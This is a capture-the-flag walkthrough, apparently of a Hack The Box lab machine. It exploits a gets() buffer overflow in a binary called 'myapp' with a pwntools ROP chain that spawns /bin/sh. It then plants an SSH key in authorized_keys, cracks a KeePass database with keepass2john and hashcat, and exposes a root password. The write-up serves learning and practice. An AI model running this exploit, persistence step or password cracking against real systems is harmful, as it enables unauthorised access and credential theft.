initial foothold

we're going to use a combination of ghidra Software Reverse Engineering Framework and GDB Enhanced Features (GEF) to analyze myapp for vulnerabilities

you can grab ghidra releases from the official NSA github page here

to install GEF, first we'll need cmake since it is a dependency
sudo apt-get install cmake

then google gef github here
and follow the instant setup section of the README file


wget -O ~/.gdbinit-gef.py -q http://gef.blah.cat/py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit



to fire up ghidra, navigate to the directory you cloned it in and execute ./ghidrarun




make a new project (and a new directory ghidra in your safe directory to hold it)


next, import the myapp file


click OK and make not ghidra knows the file is an ELF file

OK through the import summary




finally click the dragon icon to load it into ghidra

you may need to go navigate to file->open->myapp as well after ghidra runs if you see no programs in ghidra initially


finally, click the select all bujtton on the analysis options page and you're good to go!

ghidra

first, we're going to analyze myapp's main function, on the left pane of ghidra there is a symbol tree listing, expand the Functions folder and there should be a main function highlighted in pink
Note: pink highlighted functions are local functions and blue highlighted functions are imported from libraries ike lib.c




A quick rundown of what ./myapp does
1. takes an input of 112 bytes and saves it into the variable local_78
2. runs a system call on /usr/bin/uptime which is the reason we see the when we run myapp
3. myapp then reads characters from the standard input using the gets() function and stores them as a C string until a newline character or the end-of-file is reached. The gets() function does not limit the amount of characters the local_78 variable has within it so this is undoubtably vulnerable to a Buffer Overflow Attack!
4. lastly. main then writes a string to stdout using the puts() function which is why we see what we type echo back to us when we call myapp

step 1: crash the application

SInce we know ./myapp's local_76 variable is suppose to take bytes, lets send the function a few more bytes and crash it, 200 bytes for good measure





gdb tells us we crash at the return function, which points to the $rsp register, which we see has been completely overwritten with A's


take note of the $RIP register as well, here's rana khalil's rundown of our issue at the moment:

step 2: find the offset

next step is to find where exactly where the $rsp lies in memory, which will bring us closer to overwriting the $rip

to do this we'll create a pattern that will pinpoint the $rsp's location
pattern create 200


now rerun myapp with gdb and crash the program again



take note of the string that overwrites the $rsp register, copy and paste that string into


pattern search paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava


now lets test to see if the offset is correct. we'll generate 120 A's and follow with 8 B's and 8 C's and see what kind of output we get


copy and pasting this string into myapp shows us our offset is correct!

now the goal here is that we can contrinue through myapp by placing code where the 8 B's lie

overwriting $rsp register to test calling main function twice

To demonstrate what that means, lets being building our exploit now that we know where the $rsp register is located
first lets find out where in myapp the main function is located in memory, to this we'll use ghidra

main starts at the memory address 040115f , take note that it is 8 bytes long


now lets begin writing our pwn tools exploit in py, read my commented notes for details on the exploit



running
will call our main function twice, use ‘c’ to cycle through them both to verify our exploit functions correctly



type c to continue through our breakpoint


and notice although main is called twice here, we've successfully overwritten the $rsp register to call main a second time, verifying our exploit is working!

What we just did here is called a ROP Chain Exploit!But the question that still stands is how do we load our /bin/bash string into the system call?

step 3: hijack system call

Now that we know that we can overwrite ./myapp's $rsp register to call a function of our choosing, we want to hijack main's system call because that will run whatever function we want (/bin/bash)



Using Ghidra, look at the main function memory addresses and note the system call's location at 0040116e


lets set a breakpoint at this memory address and run our exploit

set a breakpoint to the memory address of main's system call with
b *0x40116e



what myapp is doing is first loading a variable into with which stands for load effective address
the system call is located at



since system is only taking 1 argument, only 1 argument gets loaded so if we do
x/s $rdi we see theres no memory address saved to our variable


step through once with si

right here is what we're loading into register $rdi


step through the program again with si




we see /usr/bin/uptime is loaded into the $rdi register

All we have to do to exploit this now is to find out to put our string (/bin/bash) into $rdi
This is where the Test method comes in


first 2 things set up the stack for being in a function
we push the base pointer to the stack and then we copy the rsp stack pointer into the base pointer

code begins here
we take the stack pointer and putting it into rdi and then jumping into whatever is in R13

gef has a built in tool call ropper that will allow us to take a closer look at what does
ropper --search “pop r13”

we see it is located in memory at and pops 3 arguments off the stack onto the stack pointer so although we only need r13 to load our /bin/bash system call, we can load null bytes into r14 and r15 and get everything we need out of the test function






0x0000000000401206: pop r13; pop r14; pop r15; ret;

disass main

we see from main that we system gets called, printf gets called, get gets called and put gets called

step 5 write exploit.py

from pwn import *# initial configuration
p = process("./myapp")
context(os="linux", arch="amd64") # parameters
junk = "A" * 112.encode() # offset - 8.
cmd = "/bin/sh\x00".encode() # argument that will be passed to RBP + null byte
pop_r13 = p64(0x401206) # pop r13
random = p64(0x000000) # random (null value) that will be put into r14 and r15
mov_rsp_to_rdi = p64(0x401152) # mv rdi, rsp (test function memory location)
system = p64(0x401040) # buffer

buf = junk + cmd #get to the RBP and pass the /bin/sh string
buf += pop_r13 # pop r13
buf += system # set r13 to system call
buf += random + random # pop r14, pop r15
buf += mov_rsp_to_rdi

p.recvline()
p.sendline(buf)
p.interactive()

dropping ssh key

Looking into user's /home directory



to generate an ssh keypair:
ssh-keygen -f user

chmod 600

copy the contents of our public key we generated


and echo it into .ssh/authorized_keys file on the box

echo <pubkey> >> authorized_keys


and now we can ssh in!
ssh -i <priv-key> user@10.10.10.147

organize picture files hashes

lets write a bash loop that will iterate through all of our picture files to find the key within them

lets start by writing a simple bash loop to list all of our pictures
for i in $(ls *.JPG); do echo $i; done;



now lets run keepass2john on all of the picture files
for i in $(ls *.JPG); do keepass2john -k $i MyPasswords.kdbx; done
where -k is the key


we see the hashes perfectly, but we don't see which hash comes from which picture file, lets use sed to replace the MyPasswords with the name of the picture file the loop is currently using
for i in (ls *.JPG); do keepass2john -k $i MyPasswords.kdbx | sed “s/MyPasswords/$i/g”; done


now we can pass each hash into hashcat to crack the kdb password

kpcli

now that we have our password (bullshit) and our picture file key IMG_0547.JPG lets go into our keypass file with the help of the img file

kpcli --kdb MyPasswords.kdb --key IMG_0547.JPG


navigate into MyPasswords


looking at the MyPasswords list, the very bottom shows root's password! lets view it with...

show 0



we see the password is hidden, to reveal it use
show 0 -f


our root password is u3v2249dl9ptv465cogl3cnpo3fyhk

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/